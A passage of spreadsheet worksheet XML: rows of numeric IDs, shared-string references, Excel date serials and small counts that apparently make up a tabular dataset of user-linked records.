      <c r="Q483" s="9" t="s">
        <v>712</v>
      </c>
    </row>
    <row r="484" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A484" s="9">
        <v>242225</v>
      </c>
      <c r="B484" s="9" t="s">
        <v>1270</v>
      </c>
      <c r="C484" s="9" t="s">
        <v>3172</v>
      </c>
      <c r="D484" s="9" t="s">
        <v>3173</v>
      </c>
      <c r="E484" s="9">
        <v>31952</v>
      </c>
      <c r="F484" s="9" t="s">
        <v>3174</v>
      </c>
      <c r="G484" s="10">
        <v>39749.175000000003</v>
      </c>
      <c r="H484" s="9">
        <v>31952</v>
      </c>
      <c r="I484" s="9" t="s">
        <v>3174</v>
      </c>
      <c r="J484" s="10">
        <v>39749.168749999997</v>
      </c>
      <c r="K484" s="9" t="s">
        <v>1271</v>
      </c>
      <c r="L484" s="7">
        <v>2</v>
      </c>
      <c r="M484" s="7">
        <v>1</v>
      </c>
      <c r="N484" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="485" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A485" s="9">
        <v>244110</v>
      </c>
      <c r="B485" s="9" t="s">
        <v>1272</v>
      </c>
      <c r="C485" s="9" t="s">
        <v>3175</v>
      </c>
      <c r="D485" s="9" t="s">
        <v>3176</v>
      </c>
      <c r="E485" s="9">
        <v>305</v>
      </c>
      <c r="F485" s="9" t="s">
        <v>1860</v>
      </c>
      <c r="G485" s="10">
        <v>39749.779166666667</v>
      </c>
      <c r="H485" s="9">
        <v>305</v>
      </c>
      <c r="I485" s="9" t="s">
        <v>1860</v>
      </c>
      <c r="J485" s="10">
        <v>39749.77847222222</v>
      </c>
      <c r="K485" s="9" t="s">
        <v>1273</v>
      </c>
      <c r="L485" s="7">
        <v>3</v>
      </c>
      <c r="M485" s="7">
        <v>1</v>
      </c>
      <c r="N485" s="9" t="s">
        <v>703</v>
      </c>
      <c r="Q485" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="486" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A486" s="9">
        <v>244439</v>
      </c>
      <c r="B486" s="12" t="s">
        <v>1274</v>
      </c>
      <c r="C486" s="9" t="s">
        <v>3177</v>
      </c>
      <c r="D486" s="9" t="s">
        <v>3178</v>
      </c>
      <c r="E486" s="9">
        <v>3434</v>
      </c>
      <c r="F486" s="9" t="s">
        <v>2024</v>
      </c>
      <c r="G486" s="10">
        <v>39871.950694444444</v>
      </c>
      <c r="H486" s="9">
        <v>3434</v>
      </c>
      <c r="I486" s="9" t="s">
        <v>2024</v>
      </c>
      <c r="J486" s="10">
        <v>39871.949999999997</v>
      </c>
      <c r="K486" s="9" t="s">
        <v>1275</v>
      </c>
      <c r="L486" s="7">
        <v>4</v>
      </c>
      <c r="M486" s="7">
        <v>2</v>
      </c>
      <c r="N486" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="487" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A487" s="9">
        <v>245223</v>
      </c>
      <c r="B487" s="9" t="s">
        <v>1276</v>
      </c>
      <c r="C487" s="9" t="s">
        <v>3179</v>
      </c>
      <c r="D487" s="9" t="s">
        <v>3180</v>
      </c>
      <c r="E487" s="9">
        <v>4831</v>
      </c>
      <c r="F487" s="9" t="s">
        <v>3181</v>
      </c>
      <c r="G487" s="10">
        <v>39750.672222222223</v>
      </c>
      <c r="H487" s="9">
        <v>893</v>
      </c>
      <c r="I487" s="9" t="s">
        <v>2109</v>
      </c>
      <c r="J487" s="10">
        <v>39749.968055555553</v>
      </c>
      <c r="K487" s="9" t="s">
        <v>1277</v>
      </c>
      <c r="L487" s="7">
        <v>3</v>
      </c>
      <c r="M487" s="7">
        <v>1</v>
      </c>
      <c r="N487" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="488" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A488" s="9">
        <v>247621</v>
      </c>
      <c r="B488" s="9" t="s">
        <v>1278</v>
      </c>
      <c r="C488" s="9" t="s">
        <v>3182</v>
      </c>
      <c r="D488" s="9" t="s">
        <v>3183</v>
      </c>
      <c r="E488" s="9">
        <v>22656</v>
      </c>
      <c r="F488" s="9" t="s">
        <v>2997</v>
      </c>
      <c r="G488" s="10">
        <v>41355.530555555553</v>
      </c>
      <c r="H488" s="9">
        <v>1540328</v>
      </c>
      <c r="I488" s="9" t="s">
        <v>3184</v>
      </c>
      <c r="J488" s="10">
        <v>41355.473611111112</v>
      </c>
      <c r="K488" s="9" t="s">
        <v>1279</v>
      </c>
      <c r="L488" s="7">
        <v>29</v>
      </c>
      <c r="M488" s="7">
        <v>27</v>
      </c>
      <c r="N488" s="9" t="s">
        <v>699</v>
      </c>
      <c r="O488" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="489" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A489" s="9">
        <v>249010</v>
      </c>
      <c r="B489" s="9" t="s">
        <v>1280</v>
      </c>
      <c r="C489" s="9" t="s">
        <v>3185</v>
      </c>
      <c r="D489" s="9" t="s">
        <v>3186</v>
      </c>
      <c r="E489" s="9">
        <v>451867</v>
      </c>
      <c r="F489" s="9" t="s">
        <v>3187</v>
      </c>
      <c r="G489" s="10">
        <v>39752.01666666667</v>
      </c>
      <c r="H489" s="9">
        <v>714</v>
      </c>
      <c r="I489" s="9" t="s">
        <v>3188</v>
      </c>
      <c r="J489" s="10">
        <v>39751.905555555553</v>
      </c>
      <c r="K489" s="9" t="s">
        <v>1281</v>
      </c>
      <c r="L489" s="7">
        <v>3</v>
      </c>
      <c r="M489" s="7">
        <v>1</v>
      </c>
      <c r="N489" s="9" t="s">
        <v>702</v>
      </c>
      <c r="O489" s="9" t="s">
        <v>704</v>
      </c>
      <c r="Q489" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="490" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A490" s="9">
        <v>249536</v>
      </c>
      <c r="B490" s="9" t="s">
        <v>1282</v>
      </c>
      <c r="C490" s="9" t="s">
        <v>3189</v>
      </c>
      <c r="D490" s="9" t="s">
        <v>3190</v>
      </c>
      <c r="E490" s="9">
        <v>939</v>
      </c>
      <c r="F490" s="9" t="s">
        <v>3191</v>
      </c>
      <c r="G490" s="10">
        <v>39751.397916666669</v>
      </c>
      <c r="H490" s="9">
        <v>939</v>
      </c>
      <c r="I490" s="9" t="s">
        <v>3191</v>
      </c>
      <c r="J490" s="10">
        <v>39751.365972222222</v>
      </c>
      <c r="K490" s="9" t="s">
        <v>1283</v>
      </c>
      <c r="L490" s="7">
        <v>3</v>
      </c>
      <c r="M490" s="7">
        <v>1</v>
      </c>
      <c r="N490" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="491" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A491" s="9">
        <v>249916</v>
      </c>
      <c r="B491" s="9" t="s">
        <v>1284</v>
      </c>
      <c r="C491" s="9" t="s">
        <v>3192</v>
      </c>
      <c r="D491" s="9" t="s">
        <v>3193</v>
      </c>
      <c r="E491" s="9">
        <v>6782</v>
      </c>
      <c r="F491" s="9" t="s">
        <v>3194</v>
      </c>
      <c r="G491" s="10">
        <v>43000.952777777777</v>
      </c>
      <c r="H491" s="9">
        <v>7232295</v>
      </c>
      <c r="I491" s="9" t="s">
        <v>3195</v>
      </c>
      <c r="J491" s="10">
        <v>43000.675000000003</v>
      </c>
      <c r="K491" s="9" t="s">
        <v>1285</v>
      </c>
      <c r="L491" s="7">
        <v>3</v>
      </c>
      <c r="M491" s="7">
        <v>1</v>
      </c>
      <c r="N491" s="9" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="492" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A492" s="9">
        <v>249985</v>
      </c>
      <c r="B492" s="9" t="s">
        <v>1286</v>
      </c>
      <c r="C492" s="9" t="s">
        <v>3196</v>
      </c>
      <c r="D492" s="9" t="s">
        <v>3197</v>
      </c>
      <c r="E492" s="9">
        <v>25731</v>
      </c>
      <c r="F492" s="9" t="s">
        <v>3198</v>
      </c>
      <c r="G492" s="10">
        <v>40282.468055555553</v>
      </c>
      <c r="H492" s="9">
        <v>14860</v>
      </c>
      <c r="I492" s="9" t="s">
        <v>1627</v>
      </c>
      <c r="J492" s="10">
        <v>39850.429166666669</v>
      </c>
      <c r="K492" s="9" t="s">
        <v>1287</v>
      </c>
      <c r="L492" s="7">
        <v>3</v>
      </c>
      <c r="M492" s="7">
        <v>1</v>
      </c>
      <c r="N492" s="9" t="s">
        <v>708</v>
      </c>
    </row>
    <row r="493" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A493" s="9">
        <v>253284</v>
      </c>
      <c r="B493" s="9" t="s">
        <v>1288</v>
      </c>
      <c r="C493" s="9" t="s">
        <v>3199</v>
      </c>
      <c r="D493" s="9" t="s">
        <v>3200</v>
      </c>
      <c r="E493" s="9">
        <v>3831</v>
      </c>
      <c r="F493" s="9" t="s">
        <v>3201</v>
      </c>
      <c r="G493" s="10">
        <v>39752.638888888891</v>
      </c>
      <c r="H493" s="9">
        <v>3831</v>
      </c>
      <c r="I493" s="9" t="s">
        <v>3201</v>
      </c>
      <c r="J493" s="10">
        <v>39752.518750000003</v>
      </c>
      <c r="K493" s="9" t="s">
        <v>1289</v>
      </c>
      <c r="L493" s="7">
        <v>3</v>
      </c>
      <c r="M493" s="7">
        <v>1</v>
      </c>
      <c r="N493" s="9" t="s">
        <v>706</v>
      </c>
      <c r="O493" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="494" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A494" s="9">
        <v>253664</v>
      </c>
      <c r="B494" s="9" t="s">
        <v>1290</v>
      </c>
      <c r="C494" s="9" t="s">
        <v>3202</v>
      </c>
      <c r="D494" s="9" t="s">
        <v>3203</v>
      </c>
      <c r="E494" s="9">
        <v>4965</v>
      </c>
      <c r="F494" s="9" t="s">
        <v>3204</v>
      </c>
      <c r="G494" s="10">
        <v>39752.614583333336</v>
      </c>
      <c r="H494" s="9">
        <v>4965</v>
      </c>
      <c r="I494" s="9" t="s">
        <v>3204</v>
      </c>
      <c r="J494" s="10">
        <v>39752.614583333336</v>
      </c>
      <c r="K494" s="9" t="s">
        <v>1291</v>
      </c>
      <c r="L494" s="7">
        <v>4</v>
      </c>
      <c r="M494" s="7">
        <v>2</v>
      </c>
      <c r="N494" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="495" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A495" s="9">
        <v>254273</v>
      </c>
      <c r="B495" s="9" t="s">
        <v>1292</v>
      </c>
      <c r="C495" s="9" t="s">
        <v>3205</v>
      </c>
      <c r="D495" s="9" t="s">
        <v>3206</v>
      </c>
      <c r="E495" s="9">
        <v>26627</v>
      </c>
      <c r="F495" s="9" t="s">
        <v>3207</v>
      </c>
      <c r="G495" s="10">
        <v>39752.770138888889</v>
      </c>
      <c r="H495" s="9">
        <v>26627</v>
      </c>
      <c r="I495" s="9" t="s">
        <v>3207</v>
      </c>
      <c r="J495" s="10">
        <v>39752.74722222222</v>
      </c>
      <c r="K495" s="9" t="s">
        <v>1293</v>
      </c>
      <c r="L495" s="7">
        <v>5</v>
      </c>
      <c r="M495" s="7">
        <v>3</v>
      </c>
      <c r="N495" s="9" t="s">
        <v>698</v>
      </c>
      <c r="O495" s="9" t="s">
        <v>700</v>
      </c>
      <c r="Q495" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="496" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A496" s="9">
        <v>254895</v>
      </c>
      <c r="B496" s="9" t="s">
        <v>1294</v>
      </c>
      <c r="C496" s="9" t="s">
        <v>3208</v>
      </c>
      <c r="D496" s="9" t="s">
        <v>3209</v>
      </c>
      <c r="E496" s="9">
        <v>11452</v>
      </c>
      <c r="F496" s="9" t="s">
        <v>3210</v>
      </c>
      <c r="G496" s="10">
        <v>39752.87222222222</v>
      </c>
      <c r="H496" s="9">
        <v>893</v>
      </c>
      <c r="I496" s="9" t="s">
        <v>2109</v>
      </c>
      <c r="J496" s="10">
        <v>39752.868750000001</v>
      </c>
      <c r="K496" s="9" t="s">
        <v>1295</v>
      </c>
      <c r="L496" s="7">
        <v>3</v>
      </c>
      <c r="M496" s="7">
        <v>1</v>
      </c>
      <c r="N496" s="9" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="497" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A497" s="9">
        <v>255006</v>
      </c>
      <c r="B497" s="9" t="s">
        <v>1296</v>
      </c>
      <c r="C497" s="9" t="s">
        <v>3211</v>
      </c>
      <c r="D497" s="9" t="s">
        <v>3212</v>
      </c>
      <c r="E497" s="9">
        <v>19124</v>
      </c>
      <c r="F497" s="9" t="s">
        <v>3213</v>
      </c>
      <c r="G497" s="10">
        <v>39755.177083333336</v>
      </c>
      <c r="H497" s="9">
        <v>19124</v>
      </c>
      <c r="I497" s="9" t="s">
        <v>3213</v>
      </c>
      <c r="J497" s="10">
        <v>39752.892361111109</v>
      </c>
      <c r="K497" s="9" t="s">
        <v>1297</v>
      </c>
      <c r="L497" s="7">
        <v>2</v>
      </c>
      <c r="M497" s="7">
        <v>1</v>
      </c>
      <c r="N497" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="498" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A498" s="9">
        <v>255785</v>
      </c>
      <c r="B498" s="9" t="s">
        <v>1298</v>
      </c>
      <c r="C498" s="9" t="s">
        <v>3214</v>
      </c>
      <c r="D498" s="9" t="s">
        <v>3215</v>
      </c>
      <c r="E498" s="9">
        <v>13227</v>
      </c>
      <c r="F498" s="9" t="s">
        <v>3216</v>
      </c>
      <c r="G498" s="10">
        <v>39753.734722222223</v>
      </c>
      <c r="H498" s="9">
        <v>17964</v>
      </c>
      <c r="I498" s="9" t="s">
        <v>3217</v>
      </c>
      <c r="J498" s="10">
        <v>39753.726388888892</v>
      </c>
      <c r="K498" s="9" t="s">
        <v>1299</v>
      </c>
      <c r="L498" s="7">
        <v>3</v>
      </c>
      <c r="M498" s="7">
        <v>1</v>
      </c>
      <c r="N498" s="9" t="s">
        <v>716</v>
      </c>
    </row>
    <row r="499" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A499" s="9">
        <v>256689</v>
      </c>
      <c r="B499" s="9" t="s">
        <v>1300</v>
      </c>
      <c r="C499" s="9" t="s">
        <v>3218</v>
      </c>
      <c r="D499" s="9" t="s">
        <v>3219</v>
      </c>
      <c r="E499" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="F499" s="9" t="s">
        <v>3220</v>
      </c>
      <c r="G499" s="10">
        <v>39755.34375</v>
      </c>
      <c r="H499" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="I499" s="9" t="s">
        <v>3220</v>
      </c>
      <c r="J499" s="10">
        <v>39754.381249999999</v>
      </c>
      <c r="K499" s="9" t="s">
        <v>1301</v>
      </c>
      <c r="L499" s="7">
        <v>2</v>
      </c>
      <c r="M499" s="7">
        <v>1</v>
      </c>
      <c r="N499" s="9" t="s">
        <v>706</v>
      </c>
      <c r="O499" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="500" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A500" s="9">
        <v>256724</v>
      </c>
      <c r="B500" s="9" t="s">
        <v>1302</v>
      </c>
      <c r="C500" s="9" t="s">
        <v>3221</v>
      </c>
      <c r="D500" s="9" t="s">
        <v>3222</v>
      </c>
      <c r="E500" s="9">
        <v>3153</v>
      </c>
      <c r="F500" s="9" t="s">
        <v>2086</v>
      </c>
      <c r="G500" s="10">
        <v>39754.447222222225</v>
      </c>
      <c r="H500" s="9">
        <v>3153</v>
      </c>
      <c r="I500" s="9" t="s">
        <v>2086</v>
      </c>
      <c r="J500" s="10">
        <v>39754.446527777778</v>
      </c>
      <c r="K500" s="9" t="s">
        <v>1303</v>
      </c>
      <c r="L500" s="7">
        <v>4</v>
      </c>
      <c r="M500" s="7">
        <v>2</v>
      </c>
      <c r="N500" s="9" t="s">
        <v>700</v>
      </c>
      <c r="O500" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="501" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A501" s="9">
        <v>257418</v>
      </c>
      <c r="B501" s="9" t="s">
        <v>1304</v>
      </c>
      <c r="C501" s="9" t="s">
        <v>3223</v>
      </c>
      <c r="D501" s="9" t="s">
        <v>3224</v>
      </c>
      <c r="E501" s="9">
        <v>140719</v>
      </c>
      <c r="F501" s="9" t="s">
        <v>3225</v>
      </c>
      <c r="G501" s="10">
        <v>41536.522916666669</v>
      </c>
      <c r="H501" s="9">
        <v>683261</v>
      </c>
      <c r="I501" s="9" t="s">
        <v>3226</v>
      </c>
      <c r="J501" s="10">
        <v>41536.509722222225</v>
      </c>
      <c r="K501" s="9" t="s">
        <v>1305</v>
      </c>
      <c r="L501" s="7">
        <v>5</v>
      </c>
      <c r="M501" s="7">
        <v>3</v>
      </c>
      <c r="Q501" s="9" t="s">
        <v>1047</v>
      </c>
    </row>
    <row r="502" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A502" s="9">
        <v>258728</v>
      </c>
      <c r="B502" s="9" t="s">
        <v>1306</v>
      </c>
      <c r="C502" s="9" t="s">
        <v>3227</v>
      </c>
      <c r="D502" s="9" t="s">
        <v>3228</v>
      </c>
      <c r="E502" s="9">
        <v>20999</v>
      </c>
      <c r="F502" s="9" t="s">
        <v>3229</v>
      </c>
      <c r="G502" s="10">
        <v>39755.600694444445</v>
      </c>
      <c r="H502" s="9">
        <v>20999</v>
      </c>
      <c r="I502" s="9" t="s">
        <v>3229</v>
      </c>
      <c r="J502" s="10">
        <v>39755.595138888886</v>
      </c>
      <c r="K502" s="9" t="s">
        <v>1307</v>
      </c>
      <c r="L502" s="7">
        <v>2</v>
      </c>
      <c r="M502" s="7">
        <v>1</v>
      </c>
      <c r="N502" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="503" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A503" s="9">
        <v>258954</v>
      </c>
      <c r="B503" s="9" t="s">
        <v>1308</v>
      </c>
      <c r="C503" s="9" t="s">
        <v>3230</v>
      </c>
      <c r="D503" s="9" t="s">
        <v>3231</v>
      </c>
      <c r="E503" s="9">
        <v>4857</v>
      </c>
      <c r="F503" s="9" t="s">
        <v>2842</v>
      </c>
      <c r="G503" s="10">
        <v>39755.745138888888</v>
      </c>
      <c r="H503" s="9">
        <v>28169</v>
      </c>
      <c r="I503" s="9" t="s">
        <v>3232</v>
      </c>
      <c r="J503" s="10">
        <v>39755.646527777775</v>
      </c>
      <c r="K503" s="9" t="s">
        <v>1309</v>
      </c>
      <c r="L503" s="7">
        <v>3</v>
      </c>
      <c r="M503" s="7">
        <v>2</v>
      </c>
      <c r="N503" s="9" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="504" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A504" s="9">
        <v>259753</v>
      </c>
      <c r="B504" s="9" t="s">
        <v>1310</v>
      </c>
      <c r="C504" s="9" t="s">
        <v>3233</v>
      </c>
      <c r="D504" s="9" t="s">
        <v>3234</v>
      </c>
      <c r="E504" s="9">
        <v>335036</v>
      </c>
      <c r="F504" s="9" t="s">
        <v>3235</v>
      </c>
      <c r="G504" s="10">
        <v>39755.838194444441</v>
      </c>
      <c r="H504" s="9">
        <v>4418</v>
      </c>
      <c r="I504" s="9" t="s">
        <v>3236</v>
      </c>
      <c r="J504" s="10">
        <v>39755.838194444441</v>
      </c>
      <c r="K504" s="9" t="s">
        <v>1311</v>
      </c>
      <c r="L504" s="7">
        <v>5</v>
      </c>
      <c r="M504" s="7">
        <v>3</v>
      </c>
      <c r="N504" s="9" t="s">
        <v>700</v>
      </c>
      <c r="O504" s="9" t="s">
        <v>706</v>
      </c>
    </row>
    <row r="505" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A505" s="9">
        <v>260098</v>
      </c>
      <c r="B505" s="9" t="s">
        <v>1312</v>
      </c>
      <c r="C505" s="9" t="s">
        <v>3237</v>
      </c>
      <c r="D505" s="9" t="s">
        <v>3238</v>
      </c>
      <c r="E505" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="F505" s="9" t="s">
        <v>2442</v>
      </c>
      <c r="G505" s="10">
        <v>40403.645138888889</v>
      </c>
      <c r="H505" s="9">
        <v>5640</v>
      </c>
      <c r="I505" s="9" t="s">
        <v>1706</v>
      </c>
      <c r="J505" s="10">
        <v>39905.654166666667</v>
      </c>
      <c r="K505" s="9" t="s">
        <v>1313</v>
      </c>
      <c r="L505" s="7">
        <v>3</v>
      </c>
      <c r="M505" s="7">
        <v>1</v>
      </c>
      <c r="N505" s="9" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="506" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A506" s="9">
        <v>260125</v>
      </c>
      <c r="B506" s="9" t="s">
        <v>1314</v>
      </c>
      <c r="C506" s="9" t="s">
        <v>3239</v>
      </c>
      <c r="D506" s="9" t="s">
        <v>3240</v>
      </c>
      <c r="E506" s="9">
        <v>23553</v>
      </c>
      <c r="F506" s="9" t="s">
        <v>3241</v>
      </c>
      <c r="G506" s="10">
        <v>39755.938194444447</v>
      </c>
      <c r="H506" s="9">
        <v>23553</v>
      </c>
      <c r="I506" s="9" t="s">
        <v>3241</v>
      </c>
      <c r="J506" s="10">
        <v>39755.925000000003</v>
      </c>
      <c r="K506" s="9" t="s">
        <v>1315</v>
      </c>
      <c r="L506" s="7">
        <v>3</v>
      </c>
      <c r="M506" s="7">
        <v>1</v>
      </c>
      <c r="Q506" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="507" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A507" s="9">
        <v>260235</v>
      </c>
      <c r="B507" s="9" t="s">
        <v>1316</v>
      </c>
      <c r="C507" s="9" t="s">
        <v>3242</v>
      </c>
      <c r="D507" s="9" t="s">
        <v>3243</v>
      </c>
      <c r="E507" s="9">
        <v>5640</v>
      </c>
      <c r="F507" s="9" t="s">
        <v>1706</v>
      </c>
      <c r="G507" s="10">
        <v>39889.82708333333</v>
      </c>
      <c r="H507" s="9">
        <v>11397</v>
      </c>
      <c r="I507" s="9" t="s">
        <v>3244</v>
      </c>
      <c r="J507" s="10">
        <v>39882.175000000003</v>
      </c>
      <c r="K507" s="9" t="s">
        <v>1317</v>
      </c>
      <c r="L507" s="7">
        <v>3</v>
      </c>
      <c r="M507" s="7">
        <v>1</v>
      </c>
      <c r="N507" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="508" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A508" s="3">
        <v>260277</v>
      </c>
      <c r="B508" s="3" t="s">
        <v>27</v>
      </c>
      <c r="C508" s="9" t="s">
        <v>3245</v>
      </c>
      <c r="D508" s="9" t="s">
        <v>3246</v>
      </c>
      <c r="E508" s="9">
        <v>28817</v>
      </c>
      <c r="F508" s="9" t="s">
        <v>3247</v>
      </c>
      <c r="G508" s="10">
        <v>41073.286805555559</v>
      </c>
      <c r="H508" s="9">
        <v>587021</v>
      </c>
      <c r="I508" s="9" t="s">
        <v>3248</v>
      </c>
      <c r="J508" s="10">
        <v>41047.642361111109</v>
      </c>
      <c r="K508" s="3" t="s">
        <v>28</v>
      </c>
      <c r="L508" s="4">
        <v>6</v>
      </c>
      <c r="M508" s="4">
        <v>4</v>
      </c>
      <c r="N508" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O508" s="3"/>
      <c r="P508" s="3"/>
      <c r="Q508" s="3"/>
    </row>
    <row r="509" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A509" s="3">
        <v>260433</v>
      </c>
      <c r="B509" s="3" t="s">
        <v>29</v>
      </c>
      <c r="C509" s="9" t="s">
        <v>3249</v>
      </c>
      <c r="D509" s="9" t="s">
        <v>3250</v>
      </c>
      <c r="E509" s="9">
        <v>27024</v>
      </c>
      <c r="F509" s="9" t="s">
        <v>3251</v>
      </c>
      <c r="G509" s="10">
        <v>41252.820833333331</v>
      </c>
      <c r="H509" s="9">
        <v>1212562</v>
      </c>
      <c r="I509" s="9" t="s">
        <v>3252</v>
      </c>
      <c r="J509" s="10">
        <v>41248.879861111112</v>
      </c>
      <c r="K509" s="3" t="s">
        <v>30</v>
      </c>
      <c r="L509" s="4">
        <v>14</v>
      </c>
      <c r="M509" s="4">
        <v>12</v>
      </c>
      <c r="N509" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O509" s="3"/>
      <c r="P509" s="3"/>
      <c r="Q509" s="3"/>
    </row>
    <row r="510" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A510" s="3">
        <v>263416</v>
      </c>
      <c r="B510" s="3" t="s">
        <v>87</v>
      </c>
      <c r="C510" s="9" t="s">
        <v>3253</v>
      </c>
      <c r="D510" s="9" t="s">
        <v>3254</v>
      </c>
      <c r="E510" s="9">
        <v>22656</v>
      </c>
      <c r="F510" s="9" t="s">
        <v>2997</v>
      </c>
      <c r="G510" s="10">
        <v>43175.305555555555</v>
      </c>
      <c r="H510" s="9">
        <v>4077294</v>
      </c>
      <c r="I510" s="9" t="s">
        <v>2854</v>
      </c>
      <c r="J510" s="10">
        <v>43175.02847222222</v>
      </c>
      <c r="K510" s="3" t="s">
        <v>88</v>
      </c>
      <c r="L510" s="4">
        <v>17</v>
      </c>
      <c r="M510" s="4">
        <v>15</v>
      </c>
      <c r="N510" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O510" s="3"/>
      <c r="P510" s="3"/>
      <c r="Q510" s="3" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="511" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A511" s="9">
        <v>263978</v>
      </c>
      <c r="B511" s="9" t="s">
        <v>1318</v>
      </c>
      <c r="C511" s="9" t="s">
        <v>3255</v>
      </c>
      <c r="D511" s="9" t="s">
        <v>3256</v>
      </c>
      <c r="E511" s="9">
        <v>13930</v>
      </c>
      <c r="F511" s="9" t="s">
        <v>3257</v>
      </c>
      <c r="G511" s="10">
        <v>39757.121527777781</v>
      </c>
      <c r="H511" s="9">
        <v>13930</v>
      </c>
      <c r="I511" s="9" t="s">
        <v>3257</v>
      </c>
      <c r="J511" s="10">
        <v>39757.119444444441</v>
      </c>
      <c r="K511" s="9" t="s">
        <v>1319</v>
      </c>
      <c r="L511" s="7">
        <v>4</v>
      </c>
      <c r="M511" s="7">
        <v>1</v>
      </c>
      <c r="N511" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="512" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A512" s="9">
        <v>264140</v>
      </c>
      <c r="B512" s="9" t="s">
        <v>1320</v>
      </c>
      <c r="C512" s="9" t="s">
        <v>3258</v>
      </c>
      <c r="D512" s="9" t="s">
        <v>3259</v>
      </c>
      <c r="E512" s="9">
        <v>451867</v>
      </c>
      <c r="F512" s="9" t="s">
        <v>3187</v>
      </c>
      <c r="G512" s="10">
        <v>39757.253472222219</v>
      </c>
      <c r="H512" s="9">
        <v>19468</v>
      </c>
      <c r="I512" s="9" t="s">
        <v>2876</v>
      </c>
      <c r="J512" s="10">
        <v>39757.213888888888</v>
      </c>
      <c r="K512" s="9" t="s">
        <v>1321</v>
      </c>
      <c r="L512" s="7">
        <v>3</v>
      </c>
      <c r="M512" s="7">
        <v>1</v>
      </c>
      <c r="N512" s="9" t="s">
        <v>705</v>
      </c>
      <c r="O512" s="9" t="s">
        <v>708</v>
      </c>
    </row>
    <row r="513" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A513" s="3">
        <v>264603</v>
      </c>
      <c r="B513" s="3" t="s">
        <v>125</v>
      </c>
      <c r="C513" s="9" t="s">
        <v>3260</v>
      </c>
      <c r="D513" s="9" t="s">
        <v>3261</v>
      </c>
      <c r="E513" s="9">
        <v>18061</v>
      </c>
      <c r="F513" s="9" t="s">
        <v>3262</v>
      </c>
      <c r="G513" s="10">
        <v>39757.359027777777</v>
      </c>
      <c r="H513" s="9">
        <v>18061</v>
      </c>
      <c r="I513" s="9" t="s">
        <v>3262</v>
      </c>
      <c r="J513" s="10">
        <v>39757.35833333333</v>
      </c>
      <c r="K513" s="3" t="s">
        <v>126</v>
      </c>
      <c r="L513" s="4">
        <v>3</v>
      </c>
      <c r="M513" s="4">
        <v>1</v>
      </c>
      <c r="N513" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O513" s="3"/>
      <c r="P513" s="3"/>
      <c r="Q513" s="3"/>
    </row>
    <row r="514" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A514" s="3">
        <v>264706</v>
      </c>
      <c r="B514" s="3" t="s">
        <v>127</v>
      </c>
      <c r="C514" s="9" t="s">
        <v>3263</v>
      </c>
      <c r="D514" s="9" t="s">
        <v>3264</v>
      </c>
      <c r="E514" s="9">
        <v>22114</v>
      </c>
      <c r="F514" s="9" t="s">
        <v>3265</v>
      </c>
      <c r="G514" s="10">
        <v>39758.731944444444</v>
      </c>
      <c r="H514" s="9">
        <v>18771</v>
      </c>
      <c r="I514" s="9" t="s">
        <v>791</v>
      </c>
      <c r="J514" s="10">
        <v>39757.44027777778</v>
      </c>
      <c r="K514" s="3" t="s">
        <v>128</v>
      </c>
